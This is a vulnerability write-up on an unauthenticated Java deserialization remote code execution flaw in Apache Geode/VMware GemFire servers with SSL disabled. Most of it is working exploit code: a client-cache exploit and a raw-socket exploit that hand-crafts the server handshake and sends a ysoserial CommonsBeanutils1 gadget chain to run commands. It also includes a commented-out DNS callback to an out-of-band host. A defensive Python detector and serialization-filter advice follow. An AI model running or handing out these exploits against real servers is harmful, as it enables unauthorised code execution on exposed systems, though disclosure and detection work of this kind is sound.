Apache Geode/VMware GemFire Deserialize RCE

The vendor disclosed this vulnerability by adding a notice to the documentation: https://docs.vmware.com/en/VMware-GemFire/10.0/gf/managing-security-hardening-guide.html

# Introduction

I found this deserialization vulnerability while hunting in the VMware vROPS product, but it cannot be exploited directly in vROPS, because that product enables SSL with mutual authentication, so an SSL client certificate is required before anything is deserialized. This post first records the deserialization RCE against a deployment with SSL disabled.

# Vulnerability description

Unauthenticated deserialization exists in GemFire: an attacker who can reach the server port can send crafted serialized data and execute code on the target machine.

# Test environment

vmware-gemfire-9.15.2.tar.gz from https://network.tanzu.vmware.com/products/pivotal-gemfire/

or Apache Geode from GitHub

# Environment build

```
.\gfsh.bat
start locator --name=locator1
start server --name=server1
```

The locator listens on port 10334 and the server on port 40404.


# Exploit

Add ysoserial-all.jar to the project's dependencies.

```java
import org.apache.geode.cache.Region;
import org.apache.geode.cache.client.ClientCache;
import org.apache.geode.cache.client.ClientCacheFactory;
import org.apache.geode.cache.client.ClientRegionShortcut;
import ysoserial.payloads.CommonsBeanutils1;

public class Main {
    public static void main(String[] args) throws Exception {
        // Connect through the locator (port 10334); it hands the client the server on port 40404.
        ClientCache cache = new ClientCacheFactory().addPoolLocator("127.0.0.1", 10334).set("log-level", "NONE").create();
        // PROXY region: every operation is forwarded to the server, nothing is cached locally.
        Region<Object, Object> region = cache.createClientRegionFactory(ClientRegionShortcut.PROXY).create("example");
        // ysoserial CommonsBeanutils1 gadget chain wrapping the command to run.
        Object object = new CommonsBeanutils1().getObject("notepad");
        // The key and value are serialized by the client and deserialized by the server.
        region.put(object, object);
    }
}
```

The malicious object is serialized by `region.put` and deserialized by the server listening on port 40404, which runs the notepad command.


Alternatively, send the serialized data directly to port 40404 over a raw socket, reproducing the client handshake by hand:

```java
import ysoserial.Serializer;
import ysoserial.payloads.CommonsBeanutils1;

import java.io.DataOutputStream;
import java.io.OutputStream;
import java.io.Serializable;
import java.net.Socket;

public class SocketTest {
    public static void main(String[] args) throws Exception {
        String host = "192.168.1.166";
        Socket client = new Socket(host, 40404);

        OutputStream outputStream = client.getOutputStream();
        // CommunicationMode 0x64=100=ClientToServer
        outputStream.write(0x64);

        // version 255 0 150
        outputStream.write(0xff);
        outputStream.write(0x0);
        outputStream.write(0x96);

        // valRead REPLY_OK
        outputStream.write(0x3b);

        DataOutputStream dataOutputStream = new DataOutputStream(outputStream);
        // timeout
        dataOutputStream.writeInt(10000);
        // DSCODE SERIALIZABLE: the bytes that follow are a plain java.io.Serializable stream
        dataOutputStream.write(0x2c);

        Serializable notepad = (Serializable) new CommonsBeanutils1().getObject("touch /tmp/fuck" + System.currentTimeMillis());
        // DNS-callback variant for confirming deserialization without executing a command:
//        Serializable notepad = (Serializable) new URLDNS().getObject("http://" + System.currentTimeMillis() +"."+host+ ".cfj4rxv2vtc0000y0xngg83ncqhyyyyyb.oast.fun");
        dataOutputStream.write(Serializer.serialize(notepad));

        dataOutputStream.flush();
        dataOutputStream.close();
        outputStream.flush();
        outputStream.close();
        client.close();
    }
}
```
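As an added defensive example, not part of the original write-up: a Python check that parses the byte layout SocketTest sends above (communication mode, version, REPLY_OK, timeout, DSCODE) from a captured client-to-server stream and flags a SERIALIZABLE dscode whose Java stream's outermost class is not on an expected-class allowlist, which is the same decision a server-side serialization filter makes. The allowlist, the sample class names and the minimal class descriptor are constructed; it models only the prefix the write-up shows, not the full GemFire protocol.

```python
import struct

# Byte layout exactly as SocketTest above writes it (values from the write-up).
COMM_MODE_CLIENT_TO_SERVER = 0x64
REPLY_OK = 0x3B
DSCODE_SERIALIZABLE = 0x2C
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72

# Hypothetical allowlist: classes this deployment legitimately expects as keys/values.
EXPECTED_CLASSES = {"com.example.Order"}

def parse_handshake(data: bytes):
    """Split a ClientToServer prefix into version, timeout, dscode and payload, else None."""
    if len(data) < 10 or data[0] != COMM_MODE_CLIENT_TO_SERVER or data[4] != REPLY_OK:
        return None
    (timeout_ms,) = struct.unpack(">i", data[5:9])
    return {"version": data[1:4].hex(), "timeout_ms": timeout_ms,
            "dscode": data[9], "payload": data[10:]}

def outer_class_name(stream: bytes):
    """Name in the first TC_CLASSDESC of a java.io.Serializable stream, if well formed."""
    pos = len(JAVA_STREAM_MAGIC)
    if not stream.startswith(JAVA_STREAM_MAGIC) or len(stream) < pos + 4:
        return None
    if stream[pos] != TC_OBJECT or stream[pos + 1] != TC_CLASSDESC:
        return None
    (name_len,) = struct.unpack(">H", stream[pos + 2:pos + 4])
    name = stream[pos + 4:pos + 4 + name_len]
    return name.decode("utf-8", "replace") if len(name) == name_len else None

def inspect(data: bytes) -> list:
    """Return findings for one captured client->server handshake (empty list = nothing flagged)."""
    hs = parse_handshake(data)
    if hs is None or hs["dscode"] != DSCODE_SERIALIZABLE:
        return []
    cls = outer_class_name(hs["payload"])
    if cls is None:
        return ["SERIALIZABLE dscode not followed by a well-formed Java stream"]
    if cls not in EXPECTED_CLASSES:
        return [f"unexpected java.io.Serializable class in handshake: {cls}"]
    return []

def build_sample(cls_name: str) -> bytes:
    """Constructed sample: the write-up's handshake bytes plus a minimal class descriptor."""
    desc = bytes([TC_OBJECT, TC_CLASSDESC]) + struct.pack(">H", len(cls_name)) + cls_name.encode()
    return (bytes([COMM_MODE_CLIENT_TO_SERVER, 0xFF, 0x00, 0x96, REPLY_OK])
            + struct.pack(">i", 10000) + bytes([DSCODE_SERIALIZABLE]) + JAVA_STREAM_MAGIC + desc)
```

On the server side the equivalent control is Apache Geode's `validate-serializable-objects=true` together with a `serializable-object-filter` naming the classes that may be deserialized; anything outside that filter is rejected before a gadget chain can run.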

My writing is poor, the wording flippant, the content shallow and my technique clumsy. Pointers and corrections from the masters are welcome; many thanks.